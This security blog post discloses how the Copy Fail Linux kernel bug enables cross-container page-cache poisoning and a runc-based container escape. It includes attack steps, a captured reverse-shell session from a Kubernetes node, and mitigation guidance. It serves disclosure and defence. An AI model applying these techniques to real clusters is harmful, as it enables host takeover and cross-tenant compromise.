# Copy Fail:From Pod to Host.

> Source: <https://xint.io/blog/copy-fail-pod-to-host>
> Published: 2026-05-19 14:53:42+00:00

# Copy Fail: From Pod to Host.

Two weeks ago, we disclosed [Copy Fail](https://copy.fail), a new and exceptionally dangerous Linux local-privilege escalation vulnerability.

Copy Fail exploits a kernel memory corruption flaw without injecting code into a running kernel, which makes it small and unusually portable. Copy Fail gives attackers a repeatable, controlled 4-byte write into the Linux page cache backing any readable file; in other words, it allows attackers to rewrite the cached contents of files on a Linux filesystem.

To help operators determine their susceptibility to Copy Fail, we published a proof-of-concept exploit and a model attack path. Our model attack targets the `su`

binary present on most Linux systems. Because `su`

is setuid root, an attacker who can rewrite it and then execute it can escalate to root. Instead of having it ask for and check a root password, the rewritten `su`

skips the paperwork and drops the caller straight into a root shell.

Our proof-of-concept led some to believe that rewriting setuid binaries like `su`

was the extent of the attack. Not so! The capability that Copy Fail and related page cache writing exploits extend to attackers is powerful and versatile. As an example, let’s walk through how to use it to break out of a namespaced container.

To understand this new exploit pattern, you have to understand a little bit about what’s happening under the hood in Copy Fail.

Copy Fail works by confusing the kernel code that handles IPSec ESP Extended Sequence Numbers (`authencesn`

). This code is exposed to unprivileged users via `AF_ALG`

sockets, which are userland’s interface to Linux’s kernel cryptography subsystem.

Specifically, Copy Fail sets the `authencesn`

code up to think it’s looking at disposable scratch memory when it’s really handling a mutable reference to the page cache. It tells the kernel’s cryptography code to decrypt a ciphertext blob, using bytes supplied by a zero-length copy from a pipe using `splice(2)`

.

Because the wire format for IPSec ESNs isn’t the implicit format the crypto code operates on, the `authencesn`

code shuffles sequence numbers around. But the code isn’t handling a disposable buffer from a packet; Copy Fail has tricked it into operating on a reference to a cached file.

Cross-container kernel attacks usually corrupt kernel memory: race windows, UAFs, version-bound payloads. These primitives are powerful, as they can allow code execution at the kernel level. But they’re fragile. Copy Fail is deterministic. It’s a more reliable primitive for cross-pod compromise or runtime poisoning, without relying on kernel code execution.

There are two primary attack scenarios:

**Scenario 1: cross-container poisoning.** From a compromised pod, or from a freshly-launched attacker pod (only`create pods`

rights required), potentially backdoor co-located pods that access the same vulnerable lower-layer file through the same underlying address_space. Image references can differ; only a layer hash needs to match. The compromise lives only in the kernel page cache so on-disk bytes are unchanged and it is invisible to agent-less disk scanners.**Scenario 2: container escape.** From inside an unprivileged container, or from a compromised DaemonSet with host-filesystem mounts, get a root shell on the host.

**Why the Page Cache Crosses Container Boundaries**

The page cache is shared across containers.

No matter what namespace you’re in, every `struct file`

the kernel handles carries an `f_mapping`

pointer, which usually comes from the underlying inode’s `i_mapping`

. That means that any two file descriptors sharing an `f_mapping`

share the same cache data.

The kernel’s representation of contiguous pages of memory is called a “folio”. For ordinary buffered I/O on regular files, a write through one fd updates the cached folios. Subsequent reads, on every related fd, see the updated data (subject to normal concurrency and ordering rules). Copy Fail mutates the same folios via the `AF_ALG/splice()`

path described in Part 1, bypassing the regular write accounting. The visibility property is unchanged: any fd whose `f_mapping`

points at the affected `address_space`

reads the modified bytes on its next page cache hit.

All of this is independent of containers. Container isolation lives in mount, network, PID, user, and IPC namespaces. None of them creates a per-container `address_space`

or page cache. Containers share cached folios when their file accesses reach the same underlying `address_space`

.

A Kubernetes container's root filesystem is commonly an **overlayfs** mount stitched together from a writable upper layer (usually per-container scratch) and one or more read-only lower layers (image layers). Container runtimes (containerd, CRI-O, others) deduplicate layers by **content hash**: if two containers on the same node use the same unpacked layer/snapshot, the corresponding lower-layer files can be backed by the same host inode/address_space, regardless of what the images are named. This reuse allows lowering the storage requirements for images by sharing common layers. `python:3.12-slim`

and `xint-flask-app:v1`

(built `FROM python:3.12-slim`

) share the Python layer. Both share `debian:bookworm-slim`

underneath. A `redis:7-bookworm`

pod on the same node shares the Debian layer with both.

In normal operation on an overlayfs mount, opening a lower-layer file for write access or truncation triggers overlayfs copy-up before writes proceed, allocating a new inode in the pod's upper layer so the change is private. By storing only this small set of differences, containers can reuse their lower layers efficiently while still allowing a writable copy to be presented to applications. However Copy Fail skips the standard write path entirely. The folios it mutates belong to the lower-layer `address_space`

itself, shared host-wide, rather than the upper layers that were meant to store write deltas.

The pods' overlayfs mounts each present what looks like a private `/usr/local/lib/python3.12/site-packages/foo.py`

(or `/lib/x86_64-linux-gnu/libc.so.6`

), but overlayfs delegates file I/O to the real lower backing file. If those backing files are the same lower inode/address_space, the cached folios are shared:

Copy Fail's 4-byte write goes into that one underlying entry. Anything that subsequently reads the same lower-layer file through the same underlying address_space can read the poisoned bytes, until the page is evicted or the layer is dropped.

The on-disk inode is unchanged so of course image-registry scanners, file-integrity monitors examining the disk hash, and offline, snapshot, or block-level scanners that bypass the affected running kernel's page cache see the original content.

**Scenario 1: Cross-Container Poisoning**

**Threat model.** Unprivileged attacker, no privileged capabilities, no node access, no admission rights to mutate other workloads. Two ways to start: code execution in a pod the attacker already controls (1-1), or just `create pods`

rights (1-2).

**Target.** Pick a file in a layer widely shared on the node: a Python `site-packages/`

module if the node hosts Python-derived workloads, a shared object such as `glibc`

for broader reach, subject to executable mapping, patch alignment, and crash-safety constraints anything inside a Debian/Ubuntu/Alpine base layer. We will use a Python source file for this demo. Pick a module imported during interpreter startup or during a common framework's init, so target pods load it early.

**The write.** Python files are a good target for a demo because they are easier to read and are more portable than shellcode. Any changes to Python files can of course be made with Copy Fail by chaining our 4 byte write primitives together. The specific choice of a file and the contents to use to replace it are an important part of weaponization. We will only provide a simple proof of concept here.

**The trigger.** The next time any pod whose image includes the targeted overlayfs layer hash imports the target module. CPython opens the `.py`

file, reads source bytes from the page cache, and compiles the patched bytes. The redirected dispatch resolves to attacker-controlled code already reachable in the image, or to a payload staged via additional Copy Fail invocations elsewhere in the layer.

**1-1: Compromised pod sharing a base layer**

The "sandbox each microservice in its own container" model assumes that code execution in any one container is bounded by that container's image and its supply chain. Shared lower-layer page cache can break that assumption. This allows not simply compromising a pod itself, but co-located pods that read the same targeted file from a shared lower layer. The target can be the most legitimate workload in the cluster: a metrics exporter, a log shipper, a CI runner, an unaudited debug sidecar. What matters is that it shares a base layer (`debian:bookworm-slim`

, `python:3.12-slim`

) with a hardened backend.

**Demo.** Pod A is the compromised pod, image `python:3.12-slim`

. Pod B is an unrelated, security-hardened backend on the same node, image `payments-api:v1`

, built `FROM python:3.12-slim`

. The image references differ; the Python layer Pod A poisons is in Pod B's stack. Pod B's deployment imports a library that pulls in the targeted module on init.

A node-scoped disk scanner running outside both pods, hashing files via the host filesystem, sees nothing. A registry scan against the image digest sees nothing. A runtime EDR that hashes resident pages of the running `python3`

after import, or that watches `execve`

and child processes inside Pod B, is the best bet for detecting the compromise.

**1-2: Pod creation rights**

In this scenario, the attacker has no existing access to any pod on the cluster. They have the ability to run `create pods`

in some namespace. Common in multi-tenant clusters, CI runners, build agents, and shared-cluster tenancy patterns, as many CI, build, and multi-tenant service accounts are intentionally granted it.

The attack does not depend on luck about layer overlap. Here, if they can read victim pod specs, or otherwise infer the victim image and node placement, pull the relevant base image into the attacker pod, and request scheduling on the victim's node via `nodeAffinity`

or `nodeName`

. Container runtime layer-hash dedup makes the attacker's overlayfs lower-layer the same host inode as the victim's; the page cache write follows.

The interesting consequence is that this attack reaches across namespace and tenant boundaries that RBAC was meant to enforce. A service account with `pods/create`

in its own namespace, no direct rights over the victim workload, can poison a backend in a different namespace by inheriting that backend's base image and landing on the same node.

**Sub-case: compromise inside a DaemonSet.** A compromised DaemonSet is a higher-leverage exploit path. Most production DaemonSets ship with `hostPath`

mounts for legitimate reasons (CNI (Container Network Interface) agents, CSI (Container Storage Interface) drivers, log forwarders, monitoring agents, security agents). The page cache shared with the host filesystem is therefore directly inside the attacker's reach. This means with the same exploit primitive the lateral target set now includes host-side binaries (`/usr/sbin/ipset`

, `iptables`

, `kubelet`

-spawned helpers), and poisoning them can lead to host-root execution if the host later executes the affected file and the patch is weaponized correctly the next time the host invokes them. Code execution in a DaemonSet is effectively pod-to-host without going through Scenario 2's mechanics.

**Scenario 2: Container Escape**

**Threat model.** Same starting position: Unprivileged container, code execution, no privileged caps. The goal is now a shell on the host.

**The shared inode.** When `runc`

patched[ CVE-2019-5736](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/), the original fix copied the

`runc`

binary to a memfd before each `execve`

so it could not be overwritten from inside the container. A[replaced the copy with a read-only bind mount of the host's](https://github.com/opencontainers/runc/commit/16612d74de5f84977e50a9c8ead7f0e9e13b8628)

__follow-up commit__`runc`

into every container, to take advantage of kernel page cache sharing across the spawn fan-out. Of course, the kernel page cache is the very thing that we are overwriting, which means that design can again expose the host runc mapping to a page-cache write primitive.**The chain.** Same shape as Datadog's[ Dirty Pipe container-escape PoC](https://www.datadoghq.com/blog/engineering/dirty-pipe-container-escape-poc/), with Copy Fail as the write primitive instead of Dirty Pipe.

**Step 1: Force **`runc`

** to run.**

When the user exec into the container, kubelet implements it via runc exec into the already-running container, which is the window we need. Container starts, restarts, and init steps don't work: they run on a fresh filesystem, before the entrypoint has planted the trap. Datadog's PoC plants it by overwriting `/bin/sh`

with `#!/proc/self/exe`

. When runc exec's a shell, the kernel resolves the shebang and re-execs `/proc/self/exe`

, which still points to runc mid-exec. That leaves a runc process pinned in the container's PID namespace, alive long enough for Step 2.

Anything that triggers a process inside the container suffices, specifically when running `kubectl exec`

in your container, a container restart, or an init step. To make the wait deterministic, Datadog's PoC overwrites `/bin/sh`

in the container with `#!/proc/self/exe`

, so the next time anyone (or anything) execs a shell inside, `runc`

is invoked.

**Step 2: Locate the runc PID.** Once `runc`

appears in the container's PID namespace, scan `/proc`

for the process whose `/proc/<pid>/exe`

symlink resolves through the bind mount to the host `runc`

inode.

**Step 3: Poison via **`/proc/<runc_pid>/exe`

**.** Open that fd. Run Copy Fail against it; the page cache write lands in the first page backing runc, replacing its ELF header and the rest of the binary with a small malicious ELF. The cached pages are now poisoned and staged for the next invocation.

**Step 4: Wait for the next **`runc`

**.** Any subsequent `runc`

invocation on the host maps the cached pages and executes the modified code as root. This includes `kubectl exec`

from an admin, the next pod start, the next probe, and so on. Attackers can often force this to happen by terminating the pod, forcing a restart.

This exploit path follows that of Dirty Pipe very closely. However, Copy Fail covers every kernel from the 2017 in-place commit ([ 72548b093ee3](https://github.com/torvalds/linux/commit/72548b093ee3)) through the 2026 fix (

[).](https://github.com/torvalds/linux/commit/a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5)

__a664bf3d603d__**PoC.** A reverse shell from host context, captured on the listener:

``` bash
ubuntu@ip-172-26-6-67:~$ nc -l 1234 -v
Listening on 0.0.0.0 1234
Connection received on ec2-43-202-13-255.ap-northeast-2.compute.amazonaws.com 52450
[cwd] /run/containerd/io.containerd.runtime.v2.task/k8s.io/880c5f77aa39359e231f5ea709148f7914584c9986f8636b1201430f842e94c2
[listdir: cwd]
.
..
init.pid
log.json
runtime
options.json
bootstrap.json
shim-binary-path
log
config.json
work
rootfs
[listdir: /]
.bottlerocket
bin
boot
dev
etc
...
x86_64-bottlerocket-linux-gnu
```

Two things to read off this output. The connecting peer is [ec2-43-202-13-255.ap-northeast-2.compute.amazonaws.com](http://ec2-43-202-13-255.ap-northeast-2.compute.amazonaws.com), an AWS public DNS name in `ap-northeast-2`

, an EKS worker EC2 instance. The shell's working directory is `/run/containerd/io.containerd.runtime.v2.task/k8s.io/880c5f77aa3.../`

, the **containerd shim's per-container runtime state directory on the host**. That path does not exist inside any pod's mount namespace; only the host (or a container with the runtime state explicitly mounted) can `chdir`

into it. The shell is on the node, not in a container.

**Detection and Mitigation**

What does and doesn't catch this:

|
|
Image registry scanning (Trivy, Clair, similar) | No. Image bytes unchanged. |
Agent-less disk scanning (sensor-less node scans, snapshot-based scanners) | No. On-disk file unchanged. |
File-integrity monitoring on disk (AIDE, Tripwire) | No. On-disk hash unchanged. |
Runtime EDR hashing in-memory pages of running processes | Yes, in principle. |
Runtime EDR monitoring | Partial. Catches post-exec behavior, not the page cache write. |
Seccomp profile blocking | Yes. Removes the primitive. |
gVisor ( | Yes. Separate user-space kernel, no shared host page cache. |
Kata Containers | Yes. Per-pod VM, separate kernel, separate page cache. |
Managed per-pod microVM (EKS Fargate; equivalents on other clouds) | Yes, by the same mechanism as Kata. Each pod runs in its own microVM with its own kernel and page cache. |
Patched host kernel | Yes. Root cause fixed. |

For mitigating this and future issues:

**Patch the host kernel.** Pull the fix () through your managed platform's node-image update or via in-place node-OS patching. This is the best way to fix the Copy Fail bug.__a664bf3d603d__**Block AF_ALG.** A pod seccomp profile that denies`socket(AF_ALG, ...)`

removes the primitive used in Copy Fail. Most production workloads do not need AF_ALG, but validate this against cryptographic or VPN/storage workloads before enforcing globally and this has the benefit of reducing attack surface against a kernel component that has had several issues besides Copy Fail.**Use VMs or similar for tenant boundaries.** Workloads that need hard isolation should never rely on containers as a security boundary. Migrating to VMs, microVMs, or systems like gVisor greatly reduce attack surface for guest-to-host attacks.

Agent-less disk scanners are unlikely to catch this compromise because the affected bytes live only in the running kernel's page cache.